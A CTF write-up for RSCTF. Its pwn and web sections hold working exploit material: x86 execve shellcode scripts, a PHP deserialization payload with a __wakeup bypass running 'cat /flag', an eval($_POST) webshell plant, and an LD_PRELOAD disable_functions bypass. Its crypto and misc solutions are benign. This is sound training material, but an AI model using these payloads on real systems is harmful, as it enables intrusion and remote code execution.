Shellcode injection itself is simple; the extra twist is that you have to adjust the stack pointer. The shellcode sits at the start of the 0x24-byte buffer, 0x08048554 is the return address (evidently a gadget that transfers control to esp), and after the ret esp points at the bytes right behind the return address. Those bytes are a small stub, sub esp,0x28 ; jmp esp, which rewinds esp by 0x24 + 4 bytes to the start of the buffer and jumps into the shellcode.

NX is disabled, so the stack is executable and you can do whatever you like; just build the stub with asm().

Exploit script:

#!/usr/bin/env python
# -*- coding: utf-8 -*-
from pwn import *

debug = 0
context(log_level="debug", arch="i386", os="linux")
if debug == 1:
    p = process('./pwn5')
    libc = ELF('/lib/x86_64-linux-gnu/libc.so.6', checksec=False)
elif debug == 0:
    p = remote('117.139.247.14', 9337)
    # libc = ELF('./', checksec=False)
elf = ELF('./pwn5', checksec=False)

# gdb.attach(p, "b *0x08048550\nc")
# 24-byte NUL-free x86 execve("/bin//sh", NULL, NULL) shellcode
shellcode_x86 = "\x31\xc0\x99\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"

pd = shellcode_x86
pd = pd.ljust(0x24, '\x00')           # shellcode at the start of the 0x24-byte buffer
pd += p32(0x08048554)                 # return address: lands execution on esp
pd += asm("sub esp,0x28;jmp esp;")    # esp points here after ret; rewind 0x28 to the buffer and jump
p.sendlineafter('>\n', pd)
p.interactive()

Flag:

Dynamic target machine (no fixed flag)

pwn-4

Description:

hint: overflow, overflow


Solution:

A challenge every platform has done to death; I remember it is on both 攻防世界 (adworld) and CGCTF under its original name, when_did_you_born.

A fairly brute-force one; I just reused a script rather than writing my own.

Exploit script:

from pwn import *

p = remote('117.139.247.14', 9514)
# p = process('./when_did_you_born')

pd = 'a' * 8           # fill the name buffer ...
pd += p64(1926)        # ... and overflow into the adjacent birth-year variable

p.sendline('1')        # the year typed directly must not be 1926; the overflow sets it afterwards
p.sendline(pd)
p.recvuntil('Have Flag.\n')
p.interactive()

Flag:

Dynamic target machine (no fixed flag)

MISC

Description:

Submit as flag{xxxx}, where xxxx is the recovered string


Solution:

Open the file in Notepad++, scroll to the last line, and paste the Morse code into a decoder.

Note that the flag is lowercase.


Flag:

flag{didi_didi_da!}

佩奇!

Description:

Learn what LSB is~


Solution:

I wanted to hit the challenge author for this one: I tried ten thousand things and nothing worked, until I remembered the py2-linux cloacked-pixel script sitting in a corner of my disk.

Project source: https://github.com/livz/cloacked-pixel

And the password is 123456. Who would guess that? I skimmed a pile of write-ups, happened to see that password in one, tried it on a whim, and it worked.

The result is a QR code; remove the black border in Photoshop and scan it for the flag.


Flag:

flag{zhang_sheng_song_gei_she_hui_ren_!}

饿了么

Description:


Solution:

The challenge is an image; running foremost on it carves out an additional zip file.

It is not a "fake encryption" zip (the encryption flag is genuinely set), so I threw it at an online cracker: the password is password.

Inside is a txt file full of jumbled characters.

Character-frequency analysis on an online site gives the flag: the characters ordered by descending frequency (watch out for ties, which the ordering cannot resolve on its own).


Flag:

flag{HibAse6432kFc}

beautiful girl

Description:


Solution:

The download is an image; looking at it in WinHex there are two PNG file headers.

Deleting the first PNG still doesn't leave a valid PNG, and the file trailer ends with a zip central-directory signature, 50 4B 01 02.

So change the second PNG header into a zip local-file header (50 4B 03 04) instead, extract, and get a picture called down.png.

Changing its height reveals a note at the bottom saying there is no flag here.

In the end an online tool decoded it, but it only works once the height is restored exactly; at the time I didn't know a method for that.

I have a tool that checks a PNG's width and height against the IHDR CRC, so I edited the height by hand until the CRC matched, ending at 0x258. (The CRC covers the chunk type plus the 13 IHDR data bytes, so the original height can be brute-forced from the stored CRC.)
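As an added example (my code, not the write-up's tool), this Python 3 snippet does exactly that check: it reads the IHDR chunk, recomputes the CRC over "IHDR" plus the 13 data bytes, and brute-forces the height field until the stored CRC matches, then writes the height back. make_sample() builds a constructed signature+IHDR prefix (width 0x320 and height 0x258 are assumed sample values) so the demo runs offline; on a real file pass the whole PNG's bytes.

```python
import struct
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"


def read_ihdr(png):
    """Return (data_offset, width, height, stored_crc) of the IHDR chunk."""
    if not png.startswith(PNG_SIG):
        raise ValueError("not a PNG: check for a second header / embedded archive first")
    length, ctype = struct.unpack(">I4s", png[8:16])
    if ctype != b"IHDR" or length != 13:
        raise ValueError("first chunk is not a 13-byte IHDR")
    data = png[16:29]
    stored_crc = struct.unpack(">I", png[29:33])[0]
    width, height = struct.unpack(">II", data[:8])
    return 16, width, height, stored_crc


def ihdr_crc(data):
    # The PNG CRC covers the chunk type bytes and the chunk data, not the length field
    return zlib.crc32(b"IHDR" + data) & 0xFFFFFFFF


def recover_height(png, max_height=10000):
    """Brute-force the height field until the IHDR CRC matches the stored one."""
    off, width, height, stored = read_ihdr(png)
    data = bytearray(png[off:off + 13])
    if ihdr_crc(data) == stored:
        return height                      # nothing was tampered with
    for h in range(1, max_height + 1):
        data[4:8] = struct.pack(">I", h)
        if ihdr_crc(data) == stored:
            return h
    raise ValueError("no height matches the CRC; maybe the width was changed as well")


def fix_height(png, height):
    """Write a new height into IHDR and leave the stored CRC alone."""
    fixed = bytearray(png)
    fixed[20:24] = struct.pack(">I", height)
    return bytes(fixed)


def make_sample(width, height):
    """Constructed minimal PNG prefix (signature + IHDR only) for the demo."""
    data = struct.pack(">IIBBBBB", width, height, 8, 6, 0, 0, 0)   # 8-bit RGBA, no interlace
    return PNG_SIG + struct.pack(">I", 13) + b"IHDR" + data + struct.pack(">I", ihdr_crc(data))


if __name__ == "__main__":
    original = make_sample(0x320, 0x258)      # assumed sample dimensions
    tampered = fix_height(original, 0x100)    # someone shrank the height but kept the CRC
    print(hex(recover_height(tampered)))      # 0x258
```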


Flag:

flag{steganography_is_interesting_!}

CRYPTO

国学

Description:

Metaphysics is the true classic
Challenge text: 兑巽艮震震乾艮乾坎巽坤震艮艮艮震坎艮坎震震艮坎坤坎坤乾震坎离艮离坎震坤震离离坤兑坎震坤震兑艮艮坤坎坎坤震兑乾离乾坎坤坎


Solution:

It would take ten thousand brains to solve this; a guessing game taken to the extreme.

Step one of the decryption: learn the Bagua numbers.

Bagua numbers:

Primordial (先天) sequence: 乾(1), 兑(2), 离(3), 震(4), 巽(5), 坎(6), 艮(7), 坤(8)

Manifested (后天) sequence: 乾(6), 坎(1), 艮(8), 震(3), 巽(4), 离(9), 坤(2), 兑(7)

The 先天 sequence is the one that works: it maps the 59 trigrams to digits 1..8, subtracting 1 gives octal digits 0..7, and the whole string read as one octal number is the ASCII of the flag. (The 后天 sequence contains a 9, which cannot become an octal digit.)

Then write the script. I went through n scripts before one worked; whoever got first, second and third blood on this has quite the imagination.

Just the first step, subtracting 1 from every digit, stuck me for ages.

Exploit script:

# Python 2
import binascii

int_dec = '25744171658477746764476868146373648433826484277866842131686'   # 先天 numbers of the trigrams
int_dec = list(int_dec)
for i in range(0, len(int_dec)):
    int_dec[i] = str(int(int_dec[i]) - 1)      # 1..8 -> 0..7
int_oct = int(''.join(int_dec))                 # the digits, read back below as octal
int_dec = int(str(int_oct), 8)
int_hex = hex(int_dec)
print binascii.a2b_hex(int_hex[2:-1]).decode("utf-8")   # [2:-1] strips '0x' and the long 'L' suffix
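As an added example (mine, not the write-up's script), a Python 3 version that starts from the trigram text itself instead of a hand-transcribed digit string, with both number tables so the failure of the 后天 mapping is visible: its 离 = 9 becomes an 8, which int(..., 8) rejects. The challenge text is the one quoted in the description.

```python
XIANTIAN = {"乾": 1, "兑": 2, "离": 3, "震": 4, "巽": 5, "坎": 6, "艮": 7, "坤": 8}
HOUTIAN = {"乾": 6, "坎": 1, "艮": 8, "震": 3, "巽": 4, "离": 9, "坤": 2, "兑": 7}

CIPHER = ("兑巽艮震震乾艮乾坎巽坤震艮艮艮震坎艮坎震震艮坎坤坎坤乾震坎离艮离坎震坤震离离坤"
          "兑坎震坤震兑艮艮坤坎坎坤震兑乾离乾坎坤坎")


def trigrams_to_digits(text, table=XIANTIAN):
    """Map every trigram to its number under the chosen table."""
    return [table[ch] for ch in text]


def decode_bagua(text, table=XIANTIAN):
    """1..8 -> 0..7 by subtracting 1, read the digits as one big octal number,
    and dump it big-endian as bytes.  Raises ValueError if a digit is not octal."""
    digits = trigrams_to_digits(text, table)
    octal = "".join(str(d - 1) for d in digits)
    n = int(octal, 8)
    return n.to_bytes((n.bit_length() + 7) // 8, "big")


def solve(text=CIPHER):
    return decode_bagua(text).decode("utf-8")


if __name__ == "__main__":
    print(solve())
```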

Flag:

flag{guo_xue_is_good!}

XOR

Description:


Solution:

A challenge that has been set countless times across platforms: XOR the first ciphertext byte with the known first plaintext byte to get the key (0x26 ^ 'f' = 0x40 = 64), then script it.

Exploit script:

# Python 2
import base64
cipher = "JiwhJzshc3lyeXZwdHJxeXFzcXZ1cXl3eHR1JnN0IiZ1JHEheD0="
cipher = base64.b64decode(cipher)
flag = ""

for i in range(len(cipher)):
    flag += chr(64 ^ ord(cipher[i]))   # single-byte key 0x40 recovered from cipher[0] ^ 'f'
print flag

Flag:

flag{a392960421913165197845f34bf5d1a8}

Ez RSA

Description:

After starting the challenge you get an IP and port, e.g. 127.0.0.1:8080; connect with nc 127.0.0.1 8080


Solution:

A neat challenge with a hidden fake flag, but basic RSA.

After connecting with nc you see:
hhhhhhhhhhhhhhhhhhhhhhhh  this is easy hhhhhhhhhhhhhhhhhhhhhhhhhhhh


N = 0x25a1b1e3108a3d2e3a962f16765e13defc71456c3804a582318de1453L

e = 5

c = 0x1c073214016413df344d16894c48103c8b92fca17f2edb3a19f4d23c6

#######################################################
Please give me long_to_bytes(m).encode('hex')=

Factor N at factordb.com to get p and q. N has a 22-bit prime factor (q = 2663993), which is why it factors instantly; even plain trial division would find it.

Then write the script.

Exploit script:

#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Python 2 (str.encode('hex'); long_to_bytes from pycrypto)
import gmpy2
import binascii
from Crypto.Util import number

p = gmpy2.mpz(23802298000094034769309134046892260326665858038920881101172459)   # from factordb
q = gmpy2.mpz(2663993)
n = gmpy2.mpz(63409155256164507967196147936982653264415559154678954807355722568787)
e = gmpy2.mpz(5)
phi_n = (p - 1) * (q - 1)
d = gmpy2.invert(e, phi_n)        # private exponent: e^-1 mod phi(n)
c = gmpy2.mpz(47227268354772263297672801857404286345600006178682788542814788330438)
m = pow(c, d, n)
print number.long_to_bytes(m).encode('hex')                           # what the service asks for
print 'This is fake flag --> ' + binascii.a2b_hex(hex(m)[2:]).decode("utf8")

Then paste the first printed line into the terminal and you get the real flag.
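As an added example (my code, not the write-up's), the same decryption in Python 3 without factordb or gmpy2: Pollard's rho finds the small factor locally in a fraction of a second, the private exponent comes from pow(e, -1, phi) (Python 3.8+), and the recovered m is checked by re-encrypting it. N, e and c are the values printed by the service.

```python
from math import gcd

N = 0x25a1b1e3108a3d2e3a962f16765e13defc71456c3804a582318de1453
E = 5
C = 0x1c073214016413df344d16894c48103c8b92fca17f2edb3a19f4d23c6


def pollard_rho(n, c=1):
    """Floyd-cycle Pollard rho.  Expected cost ~ sqrt(p) steps for the smallest
    factor p, so a 22-bit factor falls out after a few thousand iterations."""
    if n % 2 == 0:
        return 2
    x = y = 2
    while True:
        x = (x * x + c) % n
        y = (y * y + c) % n
        y = (y * y + c) % n
        d = gcd(abs(x - y), n)
        if d == n:                 # degenerate cycle: retry with another constant
            return pollard_rho(n, c + 1)
        if d > 1:
            return d


def factor(n):
    """Return (p, q) with p <= q and p * q == n."""
    d = pollard_rho(n)
    p, q = sorted((d, n // d))
    if p * q != n:
        raise ValueError("pollard_rho returned a bogus divisor")
    return p, q


def rsa_decrypt(n, e, c):
    p, q = factor(n)
    d = pow(e, -1, (p - 1) * (q - 1))   # modular inverse, Python 3.8+
    m = pow(c, d, n)
    if pow(m, e, n) != c:
        raise ValueError("decryption does not re-encrypt to c")
    return m


def solve():
    """The hex the service asks for: long_to_bytes(m).encode('hex') in Python 2 terms."""
    m = rsa_decrypt(N, E, C)
    return m.to_bytes((m.bit_length() + 7) // 8, "big").hex()


if __name__ == "__main__":
    print(solve())
```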


Flag:

Dynamic target machine (no fixed flag)

Alice is loney

Description:

After starting the challenge you get an IP and port, e.g. 127.0.0.1:8080; connect with nc 127.0.0.1 8080


Solution:

After connecting you see:
================HELLO-Ctfer================

I write some code here
#######################################################

from Crypto.Util.number import bytes_to_long

from flag import flag

m = bytes_to_long(flag)

n = 164888441809128804043925323634271956117746447290247557983550180397219601638632167520893244184248651325836885440262466991644967448074324222935200774858221524309942099541654472034185281067340449292547001584952112657559833907602079378034244708596313856132553777564957631968285353555564224702946380512343248672289

e = 2

c = pow(m,e,n)

print c

#output :499707694085937832478791464262001401287172806732772794560051316967321235368715727466292805495910281773610881330183697022117438765554611594403081

#######################################################
Please give me long_to_bytes(m).encode('hex')=

n cannot be factored, so use the small-plaintext attack: with e = 2 and a short m, m² is smaller than n (or only wraps a few times), so c = m² + k·n for a small k. Take the integer square root of c + i·n for i = 0, 1, 2, ... until it is exact. The attack script:

Exploit script:

#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Python 2 (str.encode('hex'); long_to_bytes from pycrypto)
import gmpy2
import binascii
from Crypto.Util import number

n = gmpy2.mpz(164888441809128804043925323634271956117746447290247557983550180397219601638632167520893244184248651325836885440262466991644967448074324222935200774858221524309942099541654472034185281067340449292547001584952112657559833907602079378034244708596313856132553777564957631968285353555564224702946380512343248672289)
e = gmpy2.mpz(2)
c = gmpy2.mpz(499707694085937832478791464262001401287172806732772794560051316967321235368715727466292805495910281773610881330183697022117438765554611594403081)

i = 0
while 1:
    res = gmpy2.iroot(c + i * n, e)    # (root, is_exact)
    if res[1]:
        print '[\033[0;32m+\033[0m]res = ' + str(res)
        m = gmpy2.mpz(int(res[0]))
        print '[\033[0;32m+\033[0m]ASCII = ' + binascii.a2b_hex(hex(m)[2:]).decode("utf8")
        print '[\033[0;32m+\033[0m]long_to_bytes = ' + number.long_to_bytes(m).encode('hex')
        break
    print '[\033[0;31m-\033[0m] i = ' + str(i)
    i = i + 1

Enter the long_to_bytes hex string that is printed and you get the flag.


Flag:

Dynamic target machine (no fixed flag)

WEB

bestlanguage

Description:


Solution:

A PHP deserialization challenge. Source:

<?php
error_reporting(E_ERROR);
ini_set("display_errors","Off");
highlight_file(__FILE__);
class yemoli {
    protected $alive;
    function __wakeup() {
        $this->alive = 'phpinfo();';
    }
    function __construct() {
        $this->alive = new good();
    }
    function __destruct() {
        $this->alive->action();
    }
}
class good {
    function action() {
        echo "I am a good boy!";
    }
}
class bad {
    private $code;
    function action() {
        eval($this->code);
    }
}
unserialize($_GET['string']);

__destruct() calls $this->alive->action(), so if $alive is a bad object its action() eval()s our $code. The obstacle is __wakeup(), which overwrites $alive with the harmless string 'phpinfo();' right after unserialize(). To skip __wakeup(), declare more members in the serialized object than it actually contains (the property count 2 with a single member below): affected PHP versions then skip __wakeup() but still run __destruct() (CVE-2016-7124, fixed in PHP 5.6.25 / 7.0.10).

Keep in mind the name mangling: a protected property is serialized as "\0*\0alive" (length 8) and a private one as "\0bad\0code" (length 9), with the NUL bytes sent as %00.

The rest is routine.

Exploit:

http://117.139.247.14:9759/index.php?string=O:6:"yemoli":2:{s:8:"%00*%00alive";O:3:"bad":1:{s:9:"%00bad%00code";s:20:"system("cat /flag");";}}
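Getting the name mangling and the byte lengths right by hand is the usual source of broken payloads, so here is an added example (mine, not the write-up's) that builds the serialized object programmatically in Python 3: it mangles protected/private names, computes every s:N: length in bytes, and lets the declared member count exceed the real one for the __wakeup() skip. The class and property names are the ones from the challenge source; only the helper names are mine.

```python
def php_str(s: bytes) -> bytes:
    """Serialize a PHP string; the length is in bytes, NUL bytes included."""
    return b's:%d:"%s";' % (len(s), s)


def php_prop_name(name: bytes, visibility: str = "public", cls: bytes = b"") -> bytes:
    """PHP mangles non-public property names in serialized form:
    protected -> "\\0*\\0name", private -> "\\0Class\\0name"."""
    if visibility == "protected":
        return b"\x00*\x00" + name
    if visibility == "private":
        return b"\x00" + cls + b"\x00" + name
    return name


def php_object(cls: bytes, props, declared_count=None) -> bytes:
    """props: list of (mangled_name, serialized_value).  declared_count lets the
    member count exceed the members actually supplied; PHP < 5.6.25 / 7.0.10
    (CVE-2016-7124) then skips __wakeup() but still runs __destruct()."""
    count = len(props) if declared_count is None else declared_count
    body = b"".join(php_str(n) + v for n, v in props)
    return b'O:%d:"%s":%d:{%s}' % (len(cls), cls, count, body)


def build_payload(cmd: bytes = b"cat /flag") -> bytes:
    """yemoli->alive = bad{code: system("<cmd>");}, with 2 members declared but 1 supplied."""
    code = php_str(b'system("' + cmd + b'");')
    bad = php_object(b"bad", [(php_prop_name(b"code", "private", b"bad"), code)])
    alive = (php_prop_name(b"alive", "protected"), bad)
    return php_object(b"yemoli", [alive], declared_count=2)


def as_query_string(payload: bytes) -> str:
    """Only the NUL bytes must be escaped to reproduce the write-up's URL; a browser or
    requests would percent-encode the rest of the string as well."""
    return payload.replace(b"\x00", b"%00").decode("ascii")


if __name__ == "__main__":
    print("http://117.139.247.14:9759/index.php?string=" + as_query_string(build_payload()))
```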

Flag:

Dynamic target machine (no fixed flag)

Ez Code

Description:


Solution:

This bug can be found online: it is a global variable overwrite.

Per the hint, yemoli is good at copying other people's code!!!

we guessed there is a backup file, and indeed one could be downloaded. Its source:

<?php
error_reporting(E_ERROR);
ini_set("display_errors","Off");
define('MAGIC_QUOTES_GPC', function_exists('get_magic_quotes_gpc') && @get_magic_quotes_gpc());
echo "yemoli is good at copying other people's code!!!";
$yemoli = "yemoli is cool!!!";
function _RunMagicQuotes(&$svar) {
    if (!get_magic_quotes_gpc()) {
        if (is_array($svar)) {
            foreach ($svar as $_k => $_v) $svar[$_k] = _RunMagicQuotes($_v);
        } else {
            $svar = addslashes($svar);
        }
    }
    return $svar;
}
function m_eregi($reg, $p) {
    $nreg = chgreg($reg) . "i";
    return preg_match(chgreg($reg) , $p);
}
function chgreg($reg) {
    $nreg = str_replace("/", "\\/", $reg);
    return "/" . $nreg . "/";
}
foreach ($_REQUEST as $_k => $_v) {
    if (strlen($_k) > 0 && m_eregi('^(GLOBALS)', $_k) && !isset($_COOKIE[$_k])) {
        exit('Hei Hacker!!!');
    }
}
foreach (Array(
    '_GET',
    '_POST',
    '_COOKIE'
) as $_request) {
    foreach ($$_request as $_k => $_v) ${$_k} = _RunMagicQuotes($_v);   // every request key becomes a global variable
}
unlink('/var/www/html/yemoli.php');
file_put_contents('/var/www/html/yemoli.php', $GLOBALS['yemoli']);

The ${$_k} = _RunMagicQuotes($_v) loop turns every GET/POST/COOKIE key into a global, so $yemoli (and therefore what gets written to yemoli.php) is whatever we send; the only key filter is the ^(GLOBALS) check. What's left to understand is file_put_contents().

file_put_contents(): its second argument may be an array, in which case the elements are joined into one string before being written.

If a regex check runs on the raw input first and the input is an array, PHP's loose typing coerces it to the string "Array", which satisfies a whitelist such as \A[_a-zA-Z0-9]+\z and so is not blocked.

That is how WAF-style checks for "<?" and the like are bypassed: split the tag across array elements and let file_put_contents() glue it back together.

Exploit:

http://117.139.247.14:9553/index.php?yemoli[0]=<?&yemoli[1]=php eval($_POST[xbt]);?>

// then connect to http://117.139.247.14:9553/yemoli.php with China Chopper or AntSword

Flag:

Dynamic target machine (no fixed flag)

Getshell

Description:

This site is terrible


Solution:

It starts with an ugly blob of obfuscated PHP. Source:
 <?php
define('pfkzYUelxEGmVcdDNLTjXCSIgMBKOuHAFyRtaboqwJiQWvsZrPhn', __FILE__);
$cPIHjUYxDZVBvOTsuiEClpMXAfSqrdegyFtbnGzRhWNJKwLmaokQ = urldecode("%6E1%7A%62%2F%6D%615%5C%76%740%6928%2D%70%78%75%71%79%2A6%6C%72%6B%64%679%5F%65%68%63%73%77%6F4%2B%6637%6A");
$BwltqOYbHaQkRPNoxcfnFmzsIjhdMDAWUeKGgviVrJZpLuXETSyC = $cPIHjUYxDZVBvOTsuiEClpMXAfSqrdegyFtbnGzRhWNJKwLmaokQ{3} . $cPIHjUYxDZVBvOTsuiEClpMXAfSqrdegyFtbnGzRhWNJKwLmaokQ{6} . $cPIHjUYxDZVBvOTsuiEClpMXAfSqrdegyFtbnGzRhWNJKwLmaokQ{33} . $cPIHjUYxDZVBvOTsuiEClpMXAfSqrdegyFtbnGzRhWNJKwLmaokQ{30};
$hYXlTgBqWApObxJvejPRSdHGQnauDisfENIFyocrkULwmKMCtVzZ = $cPIHjUYxDZVBvOTsuiEClpMXAfSqrdegyFtbnGzRhWNJKwLmaokQ{33} . $cPIHjUYxDZVBvOTsuiEClpMXAfSqrdegyFtbnGzRhWNJKwLmaokQ{10} . $cPIHjUYxDZVBvOTsuiEClpMXAfSqrdegyFtbnGzRhWNJKwLmaokQ{24} . $cPIHjUYxDZVBvOTsuiEClpMXAfSqrdegyFtbnGzRhWNJKwLmaokQ{10} . $cPIHjUYxDZVBvOTsuiEClpMXAfSqrdegyFtbnGzRhWNJKwLmaokQ{24};
$vNwTOsKPEAlLciJDBhWtRSHXempIrjyQUuGoaknYCdFzqZMxfbgV = $hYXlTgBqWApObxJvejPRSdHGQnauDisfENIFyocrkULwmKMCtVzZ{0} . $cPIHjUYxDZVBvOTsuiEClpMXAfSqrdegyFtbnGzRhWNJKwLmaokQ{18} . $cPIHjUYxDZVBvOTsuiEClpMXAfSqrdegyFtbnGzRhWNJKwLmaokQ{3} . $hYXlTgBqWApObxJvejPRSdHGQnauDisfENIFyocrkULwmKMCtVzZ{0} . $hYXlTgBqWApObxJvejPRSdHGQnauDisfENIFyocrkULwmKMCtVzZ{1} . $cPIHjUYxDZVBvOTsuiEClpMXAfSqrdegyFtbnGzRhWNJKwLmaokQ{24};
$ciMfTXpPoJHzZBxLOvngjQCbdIGkYlVNSumFrAUeWasKyEtwhDqR = $cPIHjUYxDZVBvOTsuiEClpMXAfSqrdegyFtbnGzRhWNJKwLmaokQ{7} . $cPIHjUYxDZVBvOTsuiEClpMXAfSqrdegyFtbnGzRhWNJKwLmaokQ{13};
$BwltqOYbHaQkRPNoxcfnFmzsIjhdMDAWUeKGgviVrJZpLuXETSyC.= $cPIHjUYxDZVBvOTsuiEClpMXAfSqrdegyFtbnGzRhWNJKwLmaokQ{22} . $cPIHjUYxDZVBvOTsuiEClpMXAfSqrdegyFtbnGzRhWNJKwLmaokQ{36} . $cPIHjUYxDZVBvOTsuiEClpMXAfSqrdegyFtbnGzRhWNJKwLmaokQ{29} . $cPIHjUYxDZVBvOTsuiEClpMXAfSqrdegyFtbnGzRhWNJKwLmaokQ{26} . $cPIHjUYxDZVBvOTsuiEClpMXAfSqrdegyFtbnGzRhWNJKwLmaokQ{30} . $cPIHjUYxDZVBvOTsuiEClpMXAfSqrdegyFtbnGzRhWNJKwLmaokQ{32} . $cPIHjUYxDZVBvOTsuiEClpMXAfSqrdegyFtbnGzRhWNJKwLmaokQ{35} . $cPIHjUYxDZVBvOTsuiEClpMXAfSqrdegyFtbnGzRhWNJKwLmaokQ{26} . $cPIHjUYxDZVBvOTsuiEClpMXAfSqrdegyFtbnGzRhWNJKwLmaokQ{30};
eval($BwltqOYbHaQkRPNoxcfnFmzsIjhdMDAWUeKGgviVrJZpLuXETSyC("$NviuywCePWEGlacAmfjrgBMTYXzHZpIxDqQnsUKkhotFSORdVJLb="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";eval('?>'.$BwltqOYbHaQkRPNoxcfnFmzsIjhdMDAWUeKGgviVrJZpLuXETSyC($hYXlTgBqWApObxJvejPRSdHGQnauDisfENIFyocrkULwmKMCtVzZ($vNwTOsKPEAlLciJDBhWtRSHXempIrjyQUuGoaknYCdFzqZMxfbgV($NviuywCePWEGlacAmfjrgBMTYXzHZpIxDqQnsUKkhotFSORdVJLb,$ciMfTXpPoJHzZBxLOvngjQCbdIGkYlVNSumFrAUeWasKyEtwhDqR*2),$vNwTOsKPEAlLciJDBhWtRSHXempIrjyQUuGoaknYCdFzqZMxfbgV($NviuywCePWEGlacAmfjrgBMTYXzHZpIxDqQnsUKkhotFSORdVJLb,$ciMfTXpPoJHzZBxLOvngjQCbdIGkYlVNSumFrAUeWasKyEtwhDqR,$ciMfTXpPoJHzZBxLOvngjQCbdIGkYlVNSumFrAUeWasKyEtwhDqR),$vNwTOsKPEAlLciJDBhWtRSHXempIrjyQUuGoaknYCdFzqZMxfbgV($NviuywCePWEGlacAmfjrgBMTYXzHZpIxDqQnsUKkhotFSORdVJLb,0,$ciMfTXpPoJHzZBxLOvngjQCbdIGkYlVNSumFrAUeWasKyEtwhDqR))));")); ?>

Deobfuscated via https://www.zhaoyuanma.com/phpjm.html, it turns into clean PHP:

<?php
highlight_file(__FILE__);
@eval($_POST[ymlisisisiook]);
?>
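The obfuscation above is mechanical, and you can undo it without trusting an online service. The urldecode()d charset is indexed with $str{n} to spell out base64_decode, strtr, substr and the number 52; the eval()'d blob $N is then split into a 52-character "to" alphabet, a 52-character "from" alphabet and a letter-substituted base64 body, decoded as base64_decode(strtr(substr($N,104), substr($N,52,52), substr($N,0,52))). As an added example (mine, not the write-up's), this Python 3 snippet resolves the names from the real charset and replays that pipeline. Because the blob itself was removed from this page, obfuscate() constructs a stand-in blob from the recovered clean PHP using a rot13-shuffled letter alphabet (an assumption, not the original's alphabet) so the decoder can be exercised end to end.

```python
import base64
import string
from urllib.parse import unquote

# The charset string from the obfuscated file; every name is spelled out by
# indexing into it with PHP's $str{n} syntax.
CHARSET = unquote("%6E1%7A%62%2F%6D%615%5C%76%740%6928%2D%70%78%75%71%79%2A6"
                  "%6C%72%6B%64%679%5F%65%68%63%73%77%6F4%2B%6637%6A")


def pick(s, *idx):
    return "".join(s[i] for i in idx)


def resolve_names():
    """Rebuild the four helper values exactly as the obfuscated PHP concatenates them."""
    base64_decode = pick(CHARSET, 3, 6, 33, 30) + pick(CHARSET, 22, 36, 29, 26, 30, 32, 35, 26, 30)
    strtr = pick(CHARSET, 33, 10, 24, 10, 24)
    substr = strtr[0] + pick(CHARSET, 18, 3) + strtr[0] + strtr[1] + CHARSET[24]
    block_len = int(pick(CHARSET, 7, 13))
    return base64_decode, strtr, substr, block_len


def deobfuscate(blob: str, block_len: int = 52) -> bytes:
    """Replay base64_decode(strtr(substr($N,104), substr($N,52,52), substr($N,0,52))):
    PHP strtr(str, from, to) maps from[i] -> to[i], which is str.translate here."""
    to_alpha = blob[:block_len]
    from_alpha = blob[block_len:2 * block_len]
    body = blob[2 * block_len:]
    return base64.b64decode(body.translate(str.maketrans(from_alpha, to_alpha)))


def obfuscate(php: bytes, from_alpha: str = "") -> str:
    """CONSTRUCTED inverse for the demo (the real blob is not on this page): base64 the
    code, swap its letters through the alphabet, and prepend both alphabets."""
    to_alpha = string.ascii_letters
    from_alpha = from_alpha or (string.ascii_uppercase[13:] + string.ascii_uppercase[:13]
                                + string.ascii_lowercase[13:] + string.ascii_lowercase[:13])
    body = base64.b64encode(php).decode().translate(str.maketrans(to_alpha, from_alpha))
    return to_alpha + from_alpha + body


CLEAN_PHP = b"<?php\nhighlight_file(__FILE__);\n@eval($_POST[ymlisisisiook]);\n?>"

if __name__ == "__main__":
    print(resolve_names())
    print(deobfuscate(obfuscate(CLEAN_PHP)).decode())
```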

Connecting with AntSword, only files under /var/www/html/ are readable; everything else is permission-denied, and the command-execution functions are in disable_functions.

AntSword's disable_functions bypass plugin shows that putenv is not disabled.

So use the LD_PRELOAD method to bypass it: upload a shared object to a writable directory, putenv("LD_PRELOAD=/path/to/evil.so"), and then call a function that spawns a child process (mail() or error_log() with type 1 spawn sendmail) so the dynamic loader runs the .so's constructor in that child, outside the disable_functions restriction.


Flag:

Dynamic target machine (no fixed flag)

签到题

车票拿好

Description:

Welcome to RSCTF! Everyone who wants to get on board, please follow the WeChat official accounts: NEEPU Sec && 七色堇安全


Solution:

Just follow the account; send "flag", or the welcome message after following gives it directly.


Flag:

flag{N33pU@CcuT}